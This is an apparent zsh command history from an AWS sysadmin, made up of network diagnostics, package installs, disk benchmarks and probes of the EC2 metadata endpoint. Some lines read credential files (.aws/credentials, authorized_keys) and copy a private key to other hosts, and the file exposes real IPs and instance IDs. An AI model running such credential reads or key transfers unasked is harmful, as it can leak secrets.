: 1460671877:0;mtr baidu.com --tcp --port 80  -f 4
: 1460671922:0;mtr baidu.com --tcp --port 80  -f 4 -c 300
: 1460671938:0;mtr baidu.com --tcp --port 80  -f 4 -c 30 --report
: 1460671992:0;mtr baidu.com --tcp --port 80  -f 4 -c 120 --report
: 1460672164:0;man mtr
: 1460672177:0;mtr baidu.com --tcp --port 80  -f 4 -c 120 -m999 --report
: 1460672706:0;mtr baidu.com  -f 4 -c 120 -m999 --report
: 1460672847:0;mtr baidu.com  -f 4 -c 120 -m999
: 1460760897:0;curl http://169.254.169.254/
: 1460760917:0;curl http://169.254.169.254/latest/
: 1460760929:0;curl http://169.254.169.254/latest/meta-data/
: 1460760953:0;curl http://169.254.169.254/latest/meta-data/instance-id
: 1460760993:0;curl http://169.254.169.254/latest/meta-data/instance-type
: 1460761364:0;ip addr
: 1460778724:0;curl -IvkL http://www.gamersgate.com/campaign/587/capcom-weekend
: 1460993504:0;ssh 52.51.44.49
: 1461003338:0;nc -vvv 52.23.229.125
: 1461003340:0;nc -vvv 52.23.229.125 22
: 1461003361:0;nc -vvvvv 52.23.229.125 22
: 1461003371:0;ssh -v amzn
: 1461088777:0;sudo yum install php php-devel zlib-devel php-pear
: 1461092111:0;wget http://mirrors.mediatemple.net/remi/enterprise/remi-release-6.rpm
: 1461092111:0;sudo yum install remi-release-6.rpm
: 1461092128:0;nano /etc/yum.repos.d/epel.repo
: 1461092143:0;sudo yum upgrade -y
: 1461092144:0;sudo yum install php70
: 1461092176:0;php70 -v
: 1461092196:0;yum install php70-php-xml php70-php-pdo php70-php-mysqlnd php70-php-gd php70-php-pecl-apcu php70-php-mbstring php70-php-mcrypt php70-php-mysqlnd php70-php-opcache
: 1461092202:0;sudo yum install php70-php-xml php70-php-pdo php70-php-mysqlnd php70-php-gd php70-php-pecl-apcu php70-php-mbstring php70-php-mcrypt php70-php-mysqlnd php70-php-opcache
: 1461092278:0;php7
: 1461092281:0;php
: 1461092297:0;php -version
: 1461092309:0;php -V
: 1461092337:0;php 
: 1461092409:0;nano test.php
: 1461092423:0;php test.php
: 1461092438:0;which php
: 1461092454:0;locate
: 1461092455:0;locate 
: 1461092468:0;rpm -qpl php79
: 1461092470:0;rpm -qpl php70
: 1461092535:0;php70 test.php > info
: 1461092728:0;yum search php70
: 1461092747:0;yum search php70 | grep memc
: 1461092779:0;yum install php70-php-pecl-memcache php70-php-pecl-memcached
: 1461092803:0;php70 test.php | grep memc
: 1461092876:0;php70 test.php | grep mem
: 1461092917:0;php70 test.php
: 1461092996:0;yum purge libmemcached-1.0.8-2.6.amzn1.x86_64
: 1461092999:0;sudo yum purge libmemcached-1.0.8-2.6.amzn1.x86_64
: 1461093007:0;sudo yum remove libmemcached-1.0.8-2.6.amzn1.x86_64
: 1461093014:0;sudo yum remove libmemcached
: 1461093034:0;sudo yum info libmemcached
: 1461093089:0;svnrev12.el6                                                        epel                                                   8.2 k
: 1461093158:0;sudo yum install php70-php-pecl-memcache php70-php-pecl-memcached
: 1461093194:0;yum --disablerepo="*" --enablerepo="remi-safe" install php70-php-pecl-memcache php70-php-pecl-memcached
: 1461093197:0;sudo yum --disablerepo="*" --enablerepo="remi-safe" install php70-php-pecl-memcache php70-php-pecl-memcached
: 1461093865:0;curl -IvkL aishsmiles.com
: 1461093871:0;curl -IvkL www.aishsmiles.com
: 1461093933:0;curl  www.aishsmiles.com
: 1461093957:0;curl aish.icykewl.com
: 1461093970:0;curl -IvkL aish.icykewl.com
: 1461094827:0;dig -x 54.83.49.201 @8.8.8.8
: 1461094904:0;dig -x 54.83.49.201
: 1461183569:0;vmstat
: 1461185863:0;yum install sar
: 1461185869:0;sudo yum install sar
: 1461185877:0;sudo yum install sysstat
: 1461247794:0;curl 169.254.169.254
: 1461247799:0;curl 169.254.169.254/latest/
: 1461247806:0;curl 169.254.169.254/latest/meta-data/
: 1461247834:0;curl 169.254.169.254/latest/meta-data/instabce-action
: 1461247838:0;curl 169.254.169.254/latest/meta-data/instance-action
: 1461247850:0;curl 169.254.169.254/latest/meta-data/mac
: 1461247859:0;curl 169.254.169.254/latest/meta-data/metrics
: 1461247866:0;curl 169.254.169.254/latest/meta-data/network
: 1461247869:0;curl 169.254.169.254/latest/meta-data/network/
: 1461247876:0;curl 169.254.169.254/latest/meta-data/profile
: 1461247886:0;curl 169.254.169.254/latest/meta-data/service/
: 1461247890:0;curl 169.254.169.254/latest/meta-data/services/
: 1461247897:0;curl 169.254.169.254/latest/meta-data/services/domain/
: 1461247984:0;curl 169.254.169.254/latest/meta-data/instance-id
: 1461248212:0;aws ec2 describe-tags --filters Name=resource-id,Values=i-0cccd03811ef0d0e1
: 1461248221:0;aws ec2 describe-tags --filters Name=resource-id,Values=i-0cccd03811ef0d0e1 --output json
: 1461248226:0;aws ec2 describe-tags --filters Name=resource-id,Values=i-0cccd03811ef0d0e1 --output test
: 1461248363:0;aws ec2 describe-tags --filters Name=string,Values=i-0cccd03811ef0d0e1
: 1461248367:0;aws ec2 describe-tags --filters Name=resource-id,Values=i-0cccd03811ef0d0e1 --output text
: 1461255081:0;ll -a
: 1461345648:0;nc -vvv 52.90.13.73  22
: 1461432317:0;cat .ssh/authorized_keys
: 1461536508:0;dig -x zer0.asuscomm.com 
: 1461536517:0;dig  zer0.asuscomm.com 
: 1461537782:0;dig -x 178.75.94.190
: 1461538606:0;curl http://api.hackertarget.com/reversedns/\?q\=8.8.8.8
: 1461538630:0;curl http://api.hackertarget.com/reversedns/\?q\=127.0.0.1
: 1461538637:0;curl http://api.hackertarget.com/reversedns/\?q\=8.8.4.4
: 1461620261:0;sudo mkfs.ext4 /dev/xvdf
: 1461620310:0;sudo mount /dev/xvdf /mnt
: 1461620343:0;yum install fio libaio libaio-devel xfsprogs -y
: 1461620347:0;sudo yum install fio libaio libaio-devel xfsprogs -y
: 1461620397:0;fio --directory=/mnt/ --name fio_test_file --direct=1 --rw=randrw --bs=256k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap
: 1461620874:0;sudo fio --directory=/mnt/ --name fio_test_file --direct=1 --rw=randrw --bs=256k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap
: 1461620898:0;sudo fio --directory=/mnt/ --name fio_test_file_1 --direct=1 --rw=randrw --bs=256k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap
: 1461621108:0;bc 
: 1461622469:0;sudo fio --directory=/mnt/ --name fio_test_file_1 --direct=1 --rw=randrw --bs=320k --size=1G --numjobs=16 --time_based --runtime=180 --group_reporting --norandommap
: 1461720549:0;sudo yum upgrade
: 1461720557:0;sudo yum autoremove 
: 1461720578:0;sudo yum update --obsoletes
: 1461720587:0;sudo yum update --no-obsoletes
: 1461720610:0;sudo yum shell
: 1461765828:0;dig InkThemes.com
: 1461765837:0;nslookup 54.68.108.39
: 1461766032:0;curl -IvkL 54.68.108.39 
: 1461766485:0;curl -IvkL https://www.inkthemes.com/hire-us/
: 1461767556:0;curl  -IvkL 54.164.58.163 
: 1461769524:0;cat /etc/grub.conf
: 1461769545:0;ssh redhat
: 1461845427:0;curl -IvkL http://s.codepen.io/epsilonhydrae/debug/GZBLNR
: 1461846543:0;nano curl.breakdown
: 1461846666:0;curl -IvkL  https://d27n4qbvjks6lc.cloudfront.net/Videos/ACCG1601_Big_River_Steel_BRS_English_5MBPS.mp4 -w "@curl.breakdown"
: 1461849612:0;nc -vvvv 52.50.191.146 80
: 1461851084:0;nslookup http://54.165.154.249
: 1461851090:0;nslookup 54.165.154.249
: 1461851311:0;curl -X POST " http://54.165.154.249/webpay/pay/?TBK_TIPO_TRANSACCION=TR_NORMAL&TBK_MONTO=10000&TBK_ORDEN_COMPRA=1&TBK_ID_SESION=1&TBK_URL_EXITO=http%3A%2F%2Fwww.a.cl&TBK_URL_FRACASO=http%3A%2F%2Fwww.b.cl"
: 1461851320:0;curl -X POST "http://54.165.154.249/webpay/pay/?TBK_TIPO_TRANSACCION=TR_NORMAL&TBK_MONTO=10000&TBK_ORDEN_COMPRA=1&TBK_ID_SESION=1&TBK_URL_EXITO=http%3A%2F%2Fwww.a.cl&TBK_URL_FRACASO=http%3A%2F%2Fwww.b.cl"
: 1461851557:0;nc -vvvv 52.50.191.146  22
: 1461851592:0;curl -vX POST "http://54.165.154.249/webpay/pay/?TBK_TIPO_TRANSACCION=TR_NORMAL&TBK_MONTO=10000&TBK_ORDEN_COMPRA=1&TBK_ID_SESION=1&TBK_URL_EXITO=http%3A%2F%2Fwww.a.cl&TBK_URL_FRACASO=http%3A%2F%2Fwww.b.cl"
: 1461851651:0;curl -IvX POST "http://54.165.154.249/webpay/pay/?TBK_TIPO_TRANSACCION=TR_NORMAL&TBK_MONTO=10000&TBK_ORDEN_COMPRA=1&TBK_ID_SESION=1&TBK_URL_EXITO=http%3A%2F%2Fwww.a.cl&TBK_URL_FRACASO=http%3A%2F%2Fwww.b.cl"
: 1461858980:0;curl -IvkL https://ssl-failure.thousandeyes.net
: 1461858999:0;curl -IvL https://ssl-failure.thousandeyes.net
: 1461932992:0;nslookup 54.179.131.162
: 1461933062:0;sudo mtr
: 1461933098:0;cat history 
: 1461933104:0;cat *history 
: 1461933109:0;ls -la
: 1461933135:0;cat .zhistory | mtr
: 1461933181:0;nc -vvv 54.179.131.162 22
: 1461934598:0;mtr -v
: 1461935095:0;dig -x 203.83.223.58
: 1461935120:0;dig -x 203.83.223.74 
: 1461935132:0;dig -x 203.83.223.17
: 1461935246:0;mtr 54.179.131.162 --tcp --port 22 -f 4 -c 300 -m999 --report
: 1461991429:0;aws ec2 describe-instances --query 'Reservations[].Instances[].[ InstanceId,[Tags[?Key==`Name`].Value][0][0],PublicIpAddress,State.Name,InstanceType,Placement.AvailabilityZone ]' --output table --region us-west-2
: 1461991433:0;aws ec2 describe-instances --query 'Reservations[].Instances[].[ InstanceId,[Tags[?Key==`Name`].Value][0][0],PublicIpAddress,State.Name,InstanceType,Placement.AvailabilityZone ]' --output table --region 
: 1461991438:0;aws ec2 describe-instances --query 'Reservations[].Instances[].[ InstanceId,[Tags[?Key==`Name`].Value][0][0],PublicIpAddress,State.Name,InstanceType,Placement.AvailabilityZone ]' --output table 
: 1462025878:0;cat .aws/credentials
: 1462026983:0;rm /home/ec2-user/.ssh/known_hosts
: 1462077012:0;cat > ls-instances
: 1462077063:0;chmod +x ls-instances
: 1462077095:0;./ls-instances --region us-west-1
: 1462077481:0;ssh 54.174.100.207
: 1462078602:0;nano ls-instances
: 1462078644:0;./ls-instances --output json --region us-west-2
: 1462078655:0;./ls-instances 
: 1462154048:0;cat
: 1462154052:0;cat .ssh/config
: 1462154058:0;cd .ssh
: 1462154059:0;ll -l
: 1462154109:0;nano config
: 1462154154:0;mv ec2-anupam-iad.pem ec2-anupam.pem
: 1462154195:0;scp ec2-anupam.pem config ubuntu:~/.ssh/
: 1462195463:0;nc -vvvvv 52.196.2.175  22
: 1462196828:0;cd /tmp
: 1462196828:0;curl https://amazon-ssm-\<region\>.s3.amazonaws.com/latest/linux_amd64/amazon-ssm-agent.rpm -o amazon-ssm-agent.rpm
: 1462200873:0;dig auth.v.r4cloud.com @8.8.8.8
: 1462201113:0;dig auth.v.r4cloud.com
: 1462201919:0;whois r4cloud.com
: 1462201980:0;dig auth.v.r4cloud.com +trace
: 1462204693:0;nslookup 54.93.193.118
: 1462217001:0;curl -IvkL http://www.rottentomatoes.com/
: 1462217029:0;curl -A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" -I --url https://www.linkedin.com/company/linkedin
: 1462217086:0;curl  -vkIL  https://www.linkedin.com/company/linkedin
: 1462217132:0;curl -IvkL rottentomatoes.com
: 1462217168:0;curl -IvkL poco.de
: 1462217253:0;curl -IvkL www.poco.de/
: 1462217315:0;curl -IvkL https://www.poco.de/
: 1462217330:0;curl -A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" -I --url https://poco.de
: 1462217636:0;curl -A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" -I --url https://www.rottentomatoes.com
: 1462217658:0;curl -A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" -IvkL --url https://www.rottentomatoes.com
: 1462217663:0;User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
: 1462217663:0;> Host: www.rottentomatoes.com
: 1462217750:0;curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0" -IvkL --url https://www.rottentomatoes.com
: 1462217762:0;curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0" -IvkL --url https://www.poco.de
: 1462288644:0;nc -vvvv 52.39.214.182  222
: 1462288691:0;nc -vvvv 52.39.214.182  22
: 1462288702:0;watch -n 1'nc -vvvv 52.39.214.182  22'
: 1462288707:0;watch -n 1 'nc -vvvv 52.39.214.182  22'
: 1462289535:0;nc -vvv 54.191.145.5 22
: 1462303140:0;nc -vvv 52.70.245.44  22
: 1462306865:0;aws describe-instances
: 1462312605:0;sudo updatedb
: 1462380570:0;rpm -qpl glinc
: 1462380572:0;rpm -qpl glibc
: 1462380575:0;rpm -qapl glibc
: 1462380579:0;rpm -qal glibc
: 1462381592:0;yum whatprovides rpm2cpio
: 1462381620:0;rpm2cpio
: 1462382056:0;cpio 
: 1462382059:0;cpio --help
: 1462390038:0;nc -vvvvv  52.34.162.218 22
: 1462390550:0;history
: 1462390607:0;cat .zhistory
: 1462390611:0;cat .zhistory | grep mtr
: 1462390644:0;mtr cs-gd-asia.com --tcp --port 80  -f 4 -c 120 -m999 --report
: 1462390942:0;curl -IvkL http://cs-gd-asia.com/images/image2.jpeg -w "@curl-format"
: 1462391013:0;curl -vkL http://cs-gd-asia.com/images/image2.jpeg -w "@curl-format"
: 1462391141:0;curl -IvkL http://cs-gd-asia.com/images/image2.jpeg -w "@curl-format" -O /dev/null 
: 1462391150:0;curl -vkL http://cs-gd-asia.com/images/image2.jpeg -w "@curl-format" -O /dev/null 
: 1462391191:0;curl -vkL http://cs-gd-asia.com/images/image2.jpeg -w "@curl-format" --silent
: 1462391261:0;curl -vkL http://cs-gd-asia.com/images/image2.jpeg -w "@curl-format" -o /dev/null  
: 1462391934:0;aws ec2 describe-instances
: 1462391953:0;aws ec2  describe-reserved-instances
: 1462391965:0;aws ec2 describe-instances | grep a250cb55
: 1462392507:0;scp curl-format 52.58.106.224:~
: 1462416095:0;mtr cs-gd-asia.com --tcp --port 80  -f 2 -c 600 -m999 --report
: 1462416663:0;mtr cs-gd-asia.com --tcp --port 80  -f 2 -c 600 -m999 --report-wide
: 1462417227:0;mtr cs-gd-asia.com --tcp --port 80  -f 2 -c 600 -m999 
: 1462417235:0;mtr cs-gd-asia.com --tcp --port 80  -f 3 -c 600 -m999 
: 1462417433:0;mtr cs-gd-asia.com --tcp --port 80  -f 4 -c 600 -m999 
: 1462420333:0;scp .ssh/ec2-anupam.pem 52.58.106.224:~/.ssh/
: 1462420397:0;scp .ssh/ec2-anupam.pem 52.51.11.195:~/.ssh/
: 1462420529:0;nslookup 52.58.106.224
: 1462420535:0;ssh 52.58.106.224
: 1462422287:0;cat curl-format
: 1462450867:0;curl -IvkL https://www.phoenixmarketcity.com
: 1462451116:0;curl -IvkL  https://user.prod.phoenixmarketcity.com. 
: 1462452542:0;dig -x 
: 1462452549:0;dig -x 52.9.181.220
: 1462454017:0;dig user.prod.phoenixmarketcity.com
: 1462455854:0;cd /usr/
: 1462455878:0;cd bin
: 1462456131:0;lsblk -f
: 1462467010:0;pip install lsoc
: 1462467020:0;sudo pip install lsoc
: 1462467032:0;which pip
: 1462467048:0;sudo /usr/local/bin/pip install lsoc
: 1462467054:0;lsoc .
: 1462467057:0;lsoc ~
: 1462467059:0;lsoc
: 1462475115:0;cat /var/log/messages
: 1462475119:0;sudo cat /var/log/messages
: 1462475291:0;sudo us
: 1462475293:0;sudo su
: 1462484045:0;sudo tcpdump -ttttnnr cap.pcap
: 1462542792:0;curl -IvkL  54.233.130.199 
: 1462542843:0;history 
: 1462542847:0;history -a
: 1462543156:0;cat .zhistory | grep curl
: 1462543198:0;curl -vkL 54.233.130.199  -w "@curl-format" -o /dev/null
: 1462543969:0;ssh 172.31.21.41
: 1462666904:0;bash ciphers.sh google.com
: 1462666925:0;bash ciphers.sh google.com 443
: 1462666928:0;cat ciphers.sh
: 1462666990:0;date
: 1462666992:0;sudo ntpdate -s time.nist.gov
: 1462666994:0;bash ciphers.sh google.com:443
: 1462667187:0;ll -al
: 1462667195:0;cat openssl-ciphers.sh
: 1462667251:0;cat 2016-03-03-21
: 1462809014:0;mtr cs-gd-asia.com --tcp --port 80  -f 4 -c 600 -m999 --report-wide
: 1462829852:0;dig -x 52.39.255.178
: 1462829869:0;dig -x mta389a.sparkpostmail.com @8.8.8.8
: 1462829884:0;watch -n 1 'dig -x mta389a.sparkpostmail.com @8.8.8.8'
: 1462833291:0;ssh 54.175.83.111
: 1462833634:0;scp 54.89.115.158:~/fish-install.sh 
: 1462892761:0;sudo service mysql restart
: 1462892914:0;curl -IvkL 52.2.100.3:443
: 1462892917:0;curl -IvkL 52.2.100.3
: 1462892965:0;curl -IvkL https://mysiteforever.com/
: 1462900438:0;nc -vvvv 52.50.245.181 20
: 1462900440:0;nc -vvvv 52.50.245.181 21
: 1462900457:0;ping 52.50.245.181
: 1462972708:0;cat .bashrc
: 1462975136:0;ll -la
: 1462975592:0;ssh v
: 1462975598:0;ssh 54.89.115.158 
: 1462975634:0;scp 54.89.115.158:~/fish-install.sh .
: 1462976275:0;nano fish-install.sh
: 1462981343:0;./ls-instances --output json
: 1462981348:0;./ls-instances --output text
: 1462981352:0;cat ls-instances
: 1462981381:0;./ls-instances --output text --region us-west-1
: 1462981446:0;./ls-instances --output text --region us-west-2
: 1462981451:0;./ls-instances --region us-west-2
: 1462981506:0;ll
: 1462988290:0;sudo tcpdump host google.com 
: 1462988304:0;ping google.com
: 1462988362:0;sudo tcpdump host cs-gd-asia.com
: 1462988365:0;curl -vkL http://cs-gd-asia.com/images/image2.jpeg -w "@curl-format" -o /dev/null
: 1462988783:0;ifconfig
: 1462988799:0;sudo ifconfig -a
: 1463005009:0;cat /proc/meminfo
: 1463005226:0;bc
: 1463005313:0;bc -l
: 1463058672:0;nc -vvvv 52.63.86.159  22
: 1463062022:0;ssh 52.62.235.227
: 1463062074:0;ssh -vvv centos@52.62.235.227
: 1463062108:0;ssh  centos@52.62.235.227
: 1463065127:0;pidof sshd
: 1463065134:0;pidof httpd
: 1463065137:0;pidof init
: 1463065163:0;lsof -a -f $(pidof init)
: 1463065180:0;lsof -a -f 1
: 1463065192:0;lsof -a -f 25171
: 1463065200:0;lsof -a -p 25171
: 1463065244:0;lsof -a -p $(pidof init)
: 1463065254:0;sudo lsof -a -p $(pidof init)
: 1463070087:0;curl -IvKL https://us-east-1-prod-iadxbl01-httpping.zionprod.systems/_ae-upstream-health
: 1463085553:0;sudo tcpdump -vnes0 -i eth0 port 67 or port 68Âƒ€
: 1463085609:0;sudo  dhclient-script
: 1463085648:0;pkill dhclient
: 1463085701:0;sudo tcpdump -vnes0 -i eth0 port 67 or port 68
: 1463085705:0;sudo pkill dhclient
: 1463085708:0;sudo  dhclient
: 1463085732:0;sudo reboot
: 1463086325:0;hostname -A
: 1463090267:0;sudo tcpdump host 172.16.0.2
: 1463090571:0;strace hostname -f 
: 1463093522:0;ssh arch
: 1463094524:0;sudo tcpdump host 172.31.0.2
: 1463094530:0;sudo tcpdump host 172.31.0.2 -vvv
: 1463098913:0;hostname --version
: 1463150400:0;sudo lsof | \
]wc -l
: 1463150404:0;sudo lsof | wc -l
: 1463155362:0;ll -al .ssh
: 1463410838:0;yum update
: 1463410841:0;sudo yum update
: 1463410966:0;yum info php56-php-imap.x86_64
: 1463411831:0;sudo yum search php-imap
: 1463411844:0;yum info php-php-imap.x86_64
: 1463411849:0;yum info php-imap.x86_64
: 1463411856:0;yum info php56-imap.x86_64
: 1463413828:0;dig -x PHP.
: 1463413836:0;dig -x 52.20.85.6
: 1463432245:0;whois 205.251.244.193
: 1463434658:0;nc -vvvv  52.16.252.29 22
: 1463434681:0;ifconfig all
: 1463434685:0;ifconfig -a
: 1463504247:0;nc -vvv 52.5.167.106 80
: 1463504251:0;nc -vvv 52.5.167.106 443
: 1463591407:0;hostname -f
: 1463591426:0;hostname 
: 1463591497:0;./ls-instances
: 1463591968:0;ssh ubuntu
: 1463591971:0;ssh ubuntu u
: 1463591973:0;ssh ubuntu 
: 1463592338:0;pwd
: 1463592347:0;cat /etc/resolv.conf
: 1463593547:0;ssh ubuntu
: 1463603463:0;history | grep curl
: 1463603469:0;history
: 1463603472:0;history -A
: 1463603474:0;history -a
: 1463603478:0;history --help
: 1463603480:0;history -h
: 1463603529:0;cat .zhistory 
: 1463603545:0;cat .zhistory | grep curl
: 1463603581:0;curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0" -IvkL --url http://54.254.151.162/
: 1463603588:0;curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0" -IvkL --url 54.254.151.162
: 1463603662:0;curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0" -IvkL --url http://www.lenskart.com/popup/enquiry/checklogin
: 1463605402:0;nslookup 52.74.219.71
: 1463633754:0;ll -al
: 1463633930:0;cat .zhistory| grep aws
: 1463633946:0;cat .zhistory| grep aws | grep run
: 1463633983:0;ll -al
: 1463634016:0;cat .zpreztorc
